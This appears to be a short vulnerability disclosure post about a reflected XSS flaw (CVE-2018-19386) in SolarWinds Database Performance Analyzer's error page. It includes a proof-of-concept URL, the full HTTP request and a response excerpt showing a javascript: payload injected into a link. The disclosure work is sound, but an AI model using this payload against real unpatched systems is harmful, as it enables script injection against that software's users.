Reflected XSS in SolarWinds Database Performance Analyzer

Just a short post from me today, bringing you a pretty simple XSS issue.

In version 11.1.457 of SolarWinds Database Performance Analyzer, there is a Reflected Cross-Site Scripting vulnerability in the ‘idcStateError.iwc’ error page. This was assigned CVE-2018–19386 and has been addressed in version 12.1. However, versions below 11.1.457 may also be vulnerable, as it is unknown when the vulnerability was originally introduced.

The following HTTP Request and response show how the issue is triggered and the results:

http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f

Request:

GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1
Host: 192.168.1.101:8123
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101:8123/iwc/login.iwc
Cookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 19 Nov 2018 18:46:00 GMT
Connection: close
Content-Length: 6531

[…]
<a href=”javascript:alert(1)//” class=”btn btn-primary”>
[…]